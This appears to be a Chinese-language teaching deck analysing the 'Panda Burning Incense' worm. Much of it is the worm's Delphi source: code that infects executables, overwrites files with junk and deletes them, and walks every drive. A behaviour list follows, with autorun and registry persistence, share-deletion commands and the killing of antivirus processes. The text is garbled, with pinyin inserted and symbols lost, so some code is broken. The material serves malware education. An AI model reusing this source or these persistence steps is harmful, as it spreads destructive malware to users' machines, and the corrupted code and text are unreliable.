熊貓燒香病毒剖析與清除

1、計算機(jī)病毒與防治(fngzh)兆吉鞋業(yè)有限公司(yu xin n s)資訊部：曾杰彬共四十頁教學(xué)單元4-4 蠕蟲病毒(bngd)防治 熊貓燒香(sho xing)病毒源碼分析 熊貓燒香病毒特點(diǎn) 熊貓燒香病毒行為分析第二講 熊貓燒香蠕蟲病毒剖析 熊貓燒香病毒的手工清除共四十頁熊貓燒香病毒(bngd)特點(diǎn)病毒名稱 熊貓(xingmo)燒香 又稱 尼姆亞、武漢男生、worm.whBoy.、worm.nimaya. 病毒類型 蠕蟲病毒危險級別 影響系統(tǒng) Win 9X/ME/NT/2000/XP/2003共四十頁熊貓(xingmo)燒香病毒特點(diǎn)2006年底，我國互聯(lián)網(wǎng)上大規(guī)模爆發(fā)“熊貓燒香(sho xi

2、ng)”病毒及其變種，該病毒通過多種方式進(jìn)行傳播，同時該病毒還具有盜取用戶游戲賬號、賬號等功能。該病毒傳播速度快，危害范圍廣，截至案發(fā)為止，已有上百萬個人用戶、網(wǎng)吧及企業(yè)局域網(wǎng)用戶遭受感染和破壞，引起社會各界高度關(guān)注。 瑞星2006安全報告將其列為十大病毒之首，在2006年度中國大陸地區(qū)電腦病毒疫情和互聯(lián)網(wǎng)安全報告的十大病毒排行中一舉成為“毒王”。共四十頁熊貓燒香(sho xing)病毒特點(diǎn)熊貓燒香一個感染型的蠕蟲病毒，它能感染系統(tǒng)中exe，com，pif，src，html，asp等文件，它還能中止大量的反病毒軟件進(jìn)程并且會刪除擴(kuò)展名為gho的文件，該文件是一系統(tǒng)備份(bi fn)工具GHOS

3、T的備份文件，使用戶的系統(tǒng)備份文件丟失。 被感染的用戶系統(tǒng)中所有.exe可執(zhí)行文件全部被改成熊貓舉著三根香的模樣。共四十頁熊貓燒香(sho xing)病毒特點(diǎn)湖北省公安廳2007年2月12日宣布(xunb)，根據(jù)統(tǒng)一部署，湖北省網(wǎng)監(jiān)在多個省市公安機(jī)關(guān)的配合下，一舉偵破了制作傳播“熊貓燒香”病毒案，抓獲李?。校瑲q，武漢新洲區(qū)人）。病毒制造者共四十頁熊貓燒香(sho xing)病毒源碼分析含有病毒體的文件被運(yùn)行后，病毒將自身拷貝至系統(tǒng)目錄，同時修改注冊表將自身設(shè)置為開機(jī)啟動項，并遍歷(bin l)各個驅(qū)動器，將自身寫入磁盤根目錄下，增加一個Autorun.inf文件，使得用戶打開該盤時激活病毒體

4、。隨后病毒體開一個線程進(jìn)行本地文件感染，同時開另外一個線程連接網(wǎng)站下載ddos程序進(jìn)行發(fā)動惡意攻擊。病毒結(jié)構(gòu) 主程序流程圖共四十頁熊貓燒香(sho xing)病毒源碼分析Program japussy;useswindows,sysutils,classes,graphics,shellapi,registry;constheadersize=82432;/病毒體的大小iconoffset=$12eb8;/pe文件主圖標(biāo)的偏移量/查找2800000020的十六進(jìn)制字符串可以找到主圖標(biāo)的偏移量headersize=38912;/upx壓縮過病毒體的大小iconoffset=$92bc;/upx壓

5、縮過pe文件主圖標(biāo)的偏移(pin y)量iconsize=$2e8;/pe文件主圖標(biāo)的大小-744字節(jié)icontail=iconoffset+iconsize;/pe文件主圖標(biāo)的尾部id=$44444444;/感染標(biāo)記病毒文件初始信息共四十頁熊貓燒香(sho xing)病毒源碼分析/垃圾(l j)碼，以備寫入catchword=ifaraceneedtobekilledout,itmustbeyamato.+ifacountryneedtobedestroyed,itmustbejapan!+*w32.japussy.worm.a*;$r*.resfunctionregisterservice

6、process(dwprocessid,dwtype:integer):integer;stdcall;externalkernel32.dll; /函數(shù)聲明vartmpfile:string;si:startupinfo;pi:process_information;isjap:boolean=false; /日文操作系統(tǒng)標(biāo)記共四十頁熊貓燒香病毒(bngd)源碼分析=判斷(pndun)是否為win9x=functioniswin9x:boolean;varver:tosversioninfo;beginresult:=false;ver.dwosversioninfosize:=sizeof

7、(tosversioninfo);ifnotgetversionex(ver)thenexit;if(ver.dwplatformid=ver_platform_win32_windows)then/win9xresult:=true;end;共四十頁熊貓燒香病毒(bngd)源碼分析=在流之間復(fù)制(fzh)=procedurecopystream(src:tstream;sstartpos:integer;dst:tstream;dstartpos:integer;count:integer);varscurpos,dcurpos:integer;beginscurpos:=src.posit

8、ion;dcurpos:=dst.position;src.seek(sstartpos,0);dst.seek(dstartpos,0);dst.copyfrom(src,count);src.seek(scurpos,0);dst.seek(dcurpos,0);end;共四十頁熊貓(xingmo)燒香病毒源碼分析=將宿主文件從已感染(gnrn)的PE文件中分離出來，以備使用=procedureextractfile(filename:string);varsstream,dstream:tfilestream;begin try sstream:=tfilestream.create(p

9、aramstr(0),fmopenreadorfmsharedenynone); try dstream:=tfilestream.create(filename,fmcreate); try sstream.seek(headersize,0); /跳過頭部的病毒部分 dstream.copyfrom(sstream,sstream.size-headersize); finally dstream.free; end;finallysstream.free;end;共四十頁熊貓燒香(sho xing)病毒源碼分析=填充(tinchng)startupinfo結(jié)構(gòu)=procedurefill

10、startupinfo(varsi:startupinfo;state:word);beginsi.cb:=sizeof(si);si.lpreserved:=nil;si.lpdesktop:=nil;si.lptitle:=nil;si.dwflags:=startf_useshowwindow;si.wshowwindow:=state;si.cbreserved2:=0;si.lpreserved2:=nil;end;=發(fā)帶毒郵件=proceduresendmail; /此處省略了帶危害性的代碼beginend;共四十頁熊貓燒香(sho xing)病毒源碼分析=感染(gnrn)PE文件

11、=procedureinfectonefile(filename:string);varhdrstream,srcstream:tfilestream;icostream,dststream:tmemorystream;iid:longint;aicon:ticon;infected,ispe:boolean;i:integer;buf:array0.1ofchar;begintry /出錯則文件正在被使用，退出ifcomparetext(filename,japussy.exe)=0then /是自己則不感染exit;infected:=false;ispe:=false;共四十頁熊貓(xi

12、ngmo)燒香病毒源碼分析srcstream:=tfilestream.create(filename,fmopenread);tryfori:=0to$108do /檢查pe文件(wnjin)頭beginsrcstream.seek(i,sofrombeginning);srcstream.read(buf,2);if(buf0=#80)and(buf1=#69)then /pe標(biāo)記beginispe:=true; /是pe文件break;end;end;srcstream.seek(-4,sofromend); /檢查感染標(biāo)記srcstream.read(iid,4);if(iid=id)

13、or(srcstream.size10240)then /太小的文件不感染infected:=true;finallysrcstream.free;end;共四十頁熊貓(xingmo)燒香病毒源碼分析ifinfectedor(notispe)then /如果感染過了或不是pe文件則退出(tuch)exit;icostream:=tmemorystream.create;dststream:=tmemorystream.create;tryaicon:=ticon.create;try/得到被感染文件的主圖標(biāo)(744字節(jié))，存入流aicon.releasehandle;aicon.handle:

14、=extracticon(hinstance,pchar(filename),0);aicon.savetostream(icostream);finallyaicon.free;end;共四十頁熊貓燒香病毒(bngd)源碼分析srcstream:=tfilestream.create(filename,fmopenread);/頭文件hdrstream:=tfilestream.create(paramstr(0),fmopenreadorfmsharedenynone);try/寫入病毒體主圖標(biāo)之前的數(shù)據(jù)copystream(hdrstream,0,dststream,0,iconoffs

15、et);/寫入目前程序(chngx)的主圖標(biāo)copystream(icostream,22,dststream,iconoffset,iconsize);/寫入病毒體主圖標(biāo)到病毒體尾部之間的數(shù)據(jù)copystream(hdrstream,icontail,dststream,icontail,headersize-icontail);/寫入宿主程序copystream(srcstream,0,dststream,headersize,srcstream.size);/寫入已感染的標(biāo)記dststream.seek(0,2);iid:=$44444444;dststream.write(iid,4)

16、;finally共四十頁熊貓燒香病毒(bngd)源碼分析=將目標(biāo)文件寫入垃圾(l j)碼后刪除=proceduresmashfile(filename:string);varfilehandle:integer;i,size,mass,max,len:integer;Begintrysetfileattributes(pchar(filename),0); /去掉只讀屬性filehandle:=fileopen(filename,fmopenwrite); /打開文件trysize:=getfilesize(filehandle,nil); /文件大小i:=0;randomize;max:=r

17、andom(15); /寫入垃圾碼的隨機(jī)次數(shù)ifmax5thenmax:=5;共四十頁熊貓燒香(sho xing)病毒源碼分析mass:=sizedivmax; /每個間隔(jin g)塊的大小len:=length(catchword);whileimaxdobeginfileseek(filehandle,i*mass,0); /定位/寫入垃圾碼，將文件徹底破壞掉filewrite(filehandle,catchword,len);inc(i);end;finallyfileclose(filehandle); /關(guān)閉文件end;/刪除之deletefile(pchar(filename

18、);共四十頁熊貓燒香病毒(bngd)源碼分析=獲得(hud)可寫的驅(qū)動器列表=functiongetdrives:string;vardisktype:word;d:char;str:string;i:integer;beginfori:=0to25do/遍歷26個字母begind:=chr(i+65);str:=d+:;disktype:=getdrivetype(pchar(str);/得到本地磁盤和網(wǎng)絡(luò)盤if(disktype=drive_fixed)or(disktype=drive_remote)thenresult:=result+d;end;共四十頁熊貓燒香(sho xing)病

19、毒源碼分析=遍歷目錄，感染(gnrn)和摧毀文件=procedureloopfiles(path,mask:string);vari,count:integer;fn,ext:string;subdir:tstrings;searchrec:tsearchrec;msg:tmsg;functionisvaliddir(searchrec:tsearchrec):integer;beginif(searchrec.attr16)and(.)and(.)thenresult:=0 /不是目錄elseif(searchrec.attr=16)and(.)and(.)thenresult:=1 /不是

20、根目錄elseresult:=2; /是根目錄end;共四十頁熊貓(xingmo)燒香病毒源碼分析beginif(findfirst(path+mask,faanyfile,searchrec)=0)thenbeginrepeat peekmessage(msg,0,0,0,pm_remove); /調(diào)整消息隊列，避免引起懷疑(huiy)ifisvaliddir(searchrec)=0thenbeginfn:=path+;ext:=uppercase(extractfileext(fn);if(ext=.exe)or(ext=.scr)thenbegin infectonefile(fn);

21、 /感染可執(zhí)行文件endelseif(ext=.htm)or(ext=.html)or(ext=.asp)thenbegin/感染html和asp文件，將base64編碼后的病毒寫入/感染瀏覽此網(wǎng)頁的所有用戶end共四十頁熊貓燒香病毒(bngd)源碼分析elseifext=.wabthen /outlook地址簿文件begin/獲取outlook郵件地址endelseifext=.adcthen /foxmail地址自動(zdng)完成文件begin/獲取foxmail郵件地址endelseifext=indthen /foxmail地址簿文件begin/獲取foxmail郵件地址子過程是典型

22、的遍歷本機(jī)中所有可用盤中的所有子目錄下的所有文件并施行相應(yīng)操作的編碼。在確定當(dāng)前文件為可執(zhí)行文件（僅針對.EXE和.SCR文件）后，調(diào)用子過程InfectOneFile進(jìn)行特定的感染。共四十頁熊貓(xingmo)燒香病毒源碼分析=遍歷磁盤(c pn)上所有的文件=procedureinfectfiles;vardriverlist:string;i,len:integer;beginifgetacp=932then /日文操作系統(tǒng)isjap:=true; driverlist:=getdrives; /得到可寫的磁盤列表len:=length(driverlist);whiletruedo /

23、死循環(huán)beginfori:=lendownto1do /遍歷每個磁盤驅(qū)動器loopfiles(driverlist+:,*.*);/感染之sendmail; /發(fā)帶毒郵件sleep(1000*60*5); /睡眠5分鐘共四十頁熊貓燒香病毒(bngd)源碼分析這里的核心是后面的死循環(huán)。先讓我們分析較簡單(jindn)的“發(fā)帶毒郵件”部分。從后面病毒具體遍歷可用磁盤并執(zhí)行具體感染過程可知，此過程中，它會取得安裝在本機(jī)中的常用郵件客戶端程序（Outlook，F(xiàn)oxMail）相應(yīng)電子郵件信息。其目的是：取得重要郵箱地址及相應(yīng)密碼，然后向這些郵件地址群發(fā)帶毒的電子郵件，從而達(dá)到利用網(wǎng)絡(luò)傳播自身的目的。共

24、四十頁熊貓燒香(sho xing)病毒源碼分析=主程序開始(kish)=beginifiswin9xthen/是win9xregisterserviceprocess(getcurrentprocessid,1)/注冊為服務(wù)進(jìn)程else/winntbegin/遠(yuǎn)程線程映射到explorer進(jìn)程end;雖然源碼提供者省略了相應(yīng)實現(xiàn)，但這是比較基本的編程實現(xiàn)。通過把自身注冊為服務(wù)進(jìn)程，可以使自己隨著系統(tǒng)的啟動一起啟動。當(dāng)然，還可以進(jìn)一步施加技巧而使自己從Windows任務(wù)管理器下隱藏顯示。共四十頁熊貓燒香病毒(bngd)源碼分析/如果是原始病毒體自己ifcomparetext(extractfil

25、ename(paramstr(0),japussy.exe)=0theninfectfiles /感染(gnrn)和發(fā)郵件else /已寄生于宿主程序上了，開始工作begintmpfile:=paramstr(0); /創(chuàng)建臨時文件delete(tmpfile,length(tmpfile)-4,4);tmpfile:=tmpfile+#32+.exe; /真正的宿主文件，多一個空格extractfile(tmpfile); /分離之fillstartupinfo(si,sw_showdefault);createprocess(pchar(tmpfile),pchar(tmpfile),ni

26、l,nil,true,0,nil,.,si,pi); /創(chuàng)建新進(jìn)程運(yùn)行之infectfiles; /感染和發(fā)郵件end;共四十頁熊貓燒香(sho xing)病毒主要行為分析熊貓燒香(sho xing)病毒樣本 熊貓燒香病毒感染D盤中的文件共四十頁熊貓燒香(sho xing)病毒主要行為分析共四十頁熊貓(xingmo)燒香病毒主要行為分析（1）復(fù)制(fzh)自身到系統(tǒng)目錄下：C:WINDOWSSystem32Driversspoclsv.exe。 熊貓燒香病毒在系統(tǒng)盤下生成的文件共四十頁熊貓燒香病毒主要行為(xngwi)分析（2）在各分區(qū)(fn q)根目錄生成病毒副本：X:setup.exeX:

27、autorun.inf其中autorun.inf中的內(nèi)容是：AutoRunOPEN=setup.exeshellexecute=setup.exeshellAutocommand=setup.exe共四十頁熊貓燒香病毒(bngd)主要行為分析（3）創(chuàng)建(chungjin)啟動項：HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunsvcshare=%System%driversspoclsv.exe 熊貓燒香在注冊表中添加啟動項共四十頁熊貓(xingmo)燒香病毒主要行為分析（4）使用net share命令關(guān)閉(gunb)管理共享

28、：cmd.exe /c net share X$ /del /y cmd.exe /c net share admin$ /del /y（5）修改“顯示所有文件和文件夾”設(shè)置：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue=dword:00000000（6）嘗試關(guān)閉安全軟件相關(guān)窗口：天網(wǎng)防火墻進(jìn)程、VirusScan 、NOD32等 （7）嘗試結(jié)束安全軟件相關(guān)進(jìn)程：Mcshield.exe VsTskMgr.exe等 共四十頁熊貓燒香病

29、毒主要行為(xngwi)分析（8）禁用(jn yn)安全軟件相關(guān)服務(wù)：Schedule sharedaccess RsCCenter 等（9）刪除安全軟件相關(guān)啟動項： SOFTWAREMicrosoftWindowsCurrentVersionRunRavTask SOFTWAREMicrosoftWindowsCurrentVersionRunKvMonXP（10）遍歷目錄修改htm/html/asp/php/jsp/aspx等網(wǎng)頁文件，在這些文件尾部追加信息： （11）在訪問過的目錄下生成Desktop_.ini文件，內(nèi)容為當(dāng)前日期。（12）此外，病毒還會嘗試刪除GHO文件。共四十頁熊貓(xingmo)燒香病毒主要行為分析病毒還嘗試使用(shyng)弱密碼將副本以GameSetup.exe的文件名復(fù)制到局域網(wǎng)內(nèi)其它計算機(jī)中。 弱密碼文件 共四十頁熊貓